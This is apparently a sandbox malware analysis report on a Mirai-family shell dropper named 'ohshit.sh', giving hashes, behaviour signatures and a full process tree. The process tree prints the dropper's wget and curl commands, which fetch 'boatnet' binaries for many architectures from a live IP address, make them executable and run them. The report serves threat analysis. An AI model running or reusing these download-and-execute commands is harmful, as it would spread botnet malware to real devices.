Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
80s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
11/03/2025, 08:32
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
37b42f54fe3c72cb1eb5543a6c17f546
-
SHA1
637b619c1d425218ed7ec1ae064fc85196423c45
-
SHA256
ab63171a0b3118f9a223b6f0cf23303cdd2aafcbdff1e8024e9728a91f99ae8d
-
SHA512
e201190305d13d12894dfe7c8cd9f0c5022ebbd3af2d573f64433f676c1b22131f1abecc9f85bce3b453de6661a10291595318d15f025465360fa52c78089f8a
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 739 chmod 751 chmod 881 chmod 887 chmod 797 chmod 829 chmod 869 chmod 875 chmod 726 chmod 733 chmod 771 chmod 863 chmod 807 chmod 815 chmod 851 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 727 ohshit.sh /tmp/WTF 734 ohshit.sh /tmp/WTF 740 ohshit.sh /tmp/WTF 753 ohshit.sh /tmp/WTF 772 ohshit.sh /tmp/WTF 798 ohshit.sh /tmp/WTF 808 ohshit.sh /tmp/WTF 816 ohshit.sh /tmp/WTF 831 ohshit.sh /tmp/WTF 852 ohshit.sh /tmp/WTF 864 ohshit.sh /tmp/WTF 870 ohshit.sh /tmp/WTF 876 ohshit.sh /tmp/WTF 882 ohshit.sh /tmp/WTF 888 ohshit.sh -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF -
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral4/files/fstream-1.dat upx behavioral4/files/fstream-4.dat upx -
description ioc Process File opened for reading /proc/827/cmdline WTF File opened for reading /proc/786/cmdline WTF File opened for reading /proc/813/cmdline WTF File opened for reading /proc/824/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/479/cmdline WTF File opened for reading /proc/511/cmdline WTF File opened for reading /proc/512/cmdline WTF File opened for reading /proc/696/cmdline WTF File opened for reading /proc/829/cmdline WTF File opened for reading /proc/841/cmdline WTF File opened for reading /proc/843/cmdline WTF File opened for reading /proc/849/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/872/cmdline WTF File opened for reading /proc/675/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/873/cmdline WTF File opened for reading /proc/695/cmdline WTF File opened for reading /proc/830/cmdline WTF File opened for reading /proc/878/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/879/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/836/cmdline WTF File opened for reading /proc/860/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/867/cmdline WTF File opened for reading /proc/885/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/465/cmdline WTF File opened for reading /proc/697/cmdline WTF File opened for reading /proc/790/cmdline WTF File opened for reading /proc/819/cmdline WTF File opened for reading /proc/866/cmdline WTF File opened for reading /proc/884/cmdline WTF File opened for reading /proc/802/cmdline WTF File opened for reading /proc/834/cmdline WTF File opened for reading /proc/856/cmdline WTF File opened for reading /proc/861/cmdline WTF File opened for reading /proc/880/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/693/cmdline WTF File opened for reading /proc/694/cmdline WTF File opened for reading /proc/811/cmdline WTF File opened for reading /proc/818/cmdline WTF File opened for reading /proc/823/cmdline WTF -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 729 wget 731 curl 732 cat -
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.arm wget File opened for modification /tmp/boatnet.arm5 wget File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.arm6 curl File opened for modification /tmp/boatnet.arm7 wget File opened for modification /tmp/boatnet.spc curl File opened for modification /tmp/boatnet.m68k wget File opened for modification /tmp/boatnet.m68k curl File opened for modification /tmp/boatnet.sh4 wget File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.arm curl File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.arm5 curl File opened for modification /tmp/boatnet.ppc wget File opened for modification /tmp/boatnet.spc wget File opened for modification /tmp/boatnet.arm6 wget File opened for modification /tmp/boatnet.arm7 curl File opened for modification /tmp/boatnet.ppc curl File opened for modification /tmp/boatnet.sh4 curl
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:696 -
/usr/bin/wgetwget http://107.172.82.193/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:702
-
-
/usr/bin/curlcurl -O http://107.172.82.193/hiddenbin/boatnet.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:717
-
-
/bin/catcat boatnet.x862⤵PID:725
-
-
/bin/chmodchmod +x boatnet.x86 ohshit.sh systemd-private-c64f833f9b554514afef46d79950adb2-systemd-timedated.service-74oe8r WTF2⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/WTF./WTF2⤵PID:727
-
-
/usr/bin/wgetwget http://107.172.82.193/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:729
-
-
/usr/bin/curlcurl -O http://107.172.82.193/hiddenbin/boatnet.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:731
-
-
/bin/catcat boatnet.mips2⤵
- System Network Configuration Discovery
PID:732
-
-
/bin/chmodchmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-c64f833f9b554514afef46d79950adb2-systemd-timedated.service-74oe8r WTF2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/WTF./WTF2⤵PID:734
-
-
/usr/bin/wgetwget http://107.172.82.193/hiddenbin/boatnet.arc2⤵PID:736
-
-
/usr/bin/curlcurl -O http://107.172.82.193/hiddenbin/boatnet.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/catcat boatnet.arc2⤵PID:738
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-c64f833f9b554514afef46d79950adb2-systemd-timedated.service-74oe8r WTF2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/WTF./WTF2⤵PID:740
-
-
/usr/bin/wgetwget http://107.172.82.193/hiddenbin/boatnet.i4682⤵PID:741
-
-
/usr/bin/curlcurl -O http://107.172.82.193/hiddenbin/boatnet.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:742
-
-
/bin/catcat boatnet.i4682⤵PID:750
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-c64f833f9b554514afef46d79950adb2-systemd-timedated.service-74oe8r WTF2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/WTF./WTF2⤵PID:753
-
-
/usr/bin/wgetwget http://107.172.82.193/hiddenbin/boatnet.i6862⤵PID:755
-
-
/usr/bin/curlcurl -O http://107.172.82.193/hiddenbin/boatnet.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/catcat boatnet.i6862⤵PID:770
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-c64f833f9b554514afef46d79950adb2-systemd-timedated.service-74oe8r WTF2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/WTF./WTF2⤵PID:772
-
-
/usr/bin/wgetwget http://107.172.82.193/hiddenbin/boatnet.x86_642⤵PID:775
-
-
/usr/bin/curlcurl -O http://107.172.82.193/hiddenbin/boatnet.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:783
-
-
/bin/catcat boatnet.x86_642⤵PID:795
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/WTF./WTF2⤵PID:798
-
-
/usr/bin/wgetwget http://107.172.82.193/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:800
-
-
/usr/bin/curlcurl -O http://107.172.82.193/hiddenbin/boatnet.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/catcat boatnet.mpsl2⤵PID:806
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/WTF./WTF2⤵
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:808
-
-
/usr/bin/wgetwget http://107.172.82.193/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:812
-
-
/usr/bin/curlcurl -O http://107.172.82.193/hiddenbin/boatnet.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/catcat boatnet.arm2⤵PID:814
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/WTF./WTF2⤵PID:816
-
-
/usr/bin/wgetwget http://107.172.82.193/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:818
-
-
/usr/bin/curlcurl -O http://107.172.82.193/hiddenbin/boatnet.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/catcat boatnet.arm52⤵PID:828
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/WTF./WTF2⤵PID:831
-
-
/usr/bin/wgetwget http://107.172.82.193/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:834
-
-
/usr/bin/curlcurl -O http://107.172.82.193/hiddenbin/boatnet.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:841
-
-
/bin/catcat boatnet.arm62⤵PID:850
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/WTF./WTF2⤵PID:852
-
-
/usr/bin/wgetwget http://107.172.82.193/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:856
-
-
/usr/bin/curlcurl -O http://107.172.82.193/hiddenbin/boatnet.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/catcat boatnet.arm72⤵PID:862
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/WTF./WTF2⤵PID:864
-
-
/usr/bin/wgetwget http://107.172.82.193/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:866
-
-
/usr/bin/curlcurl -O http://107.172.82.193/hiddenbin/boatnet.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/catcat boatnet.ppc2⤵PID:868
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/WTF./WTF2⤵PID:870
-
-
/usr/bin/wgetwget http://107.172.82.193/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:872
-
-
/usr/bin/curlcurl -O http://107.172.82.193/hiddenbin/boatnet.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/catcat boatnet.spc2⤵PID:874
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/WTF./WTF2⤵PID:876
-
-
/usr/bin/wgetwget http://107.172.82.193/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:878
-
-
/usr/bin/curlcurl -O http://107.172.82.193/hiddenbin/boatnet.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/catcat boatnet.m68k2⤵PID:880
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/WTF./WTF2⤵PID:882
-
-
/usr/bin/wgetwget http://107.172.82.193/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:884
-
-
/usr/bin/curlcurl -O http://107.172.82.193/hiddenbin/boatnet.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/catcat boatnet.sh42⤵PID:886
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/WTF./WTF2⤵PID:888
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD56e0d03239183153de8b328368eec14c0
SHA1d4436c25ca650862b1d626bc735d621720c850c3
SHA256c28c0adf305d4225c9d21fa9c254519a07e24d4411b42b99c85d882be65a0d1b
SHA512e96bfb589fa14c9b373d12765b52d17d8f505ee2e55d26bae4067a0d738d89e4e5490927060f8331569c7df4943719fb12e4c36b464eb3c9496abdd8da80edcd
-
Filesize
162B
MD51b7c22a214949975556626d7217e9a39
SHA1d01c97e2944166ed23e47e4a62ff471ab8fa031f
SHA256340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
SHA512ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5
-
Filesize
57KB
MD5d55ad7ddc6b166522c3225839df619c3
SHA1bb4c61e25abce482514e76907840605cf1abbbf8
SHA2566c73b9ee290ffc3d5671821ea05d67ca012b3617a432107dbfe8fab0f1b6d7c7
SHA51294508665c042fae60ce9e21b262f120c7f5b19a92e55c497408c0d71f4a51718315465070bffec2e9293a73b99734a3c7bdbbedce33d80a8cca667e939170916
-
Filesize
20KB
MD5681dd964889eddd4cfdc230ba745767b
SHA1bdb24c1844bc8285e2bf781613149f6db7b4928d
SHA256fca185b5efc7e5df44003d8612f179414eadb71c31386c707a7e6f1f8809790e
SHA512ac2556dd6bf5c1fde0c0eea5c78037274065cbb5231969d572c8df8dafe3740c49d2c681d21e3abc0f786f1c617162af4c955543f28fe1462dbd196565c655a4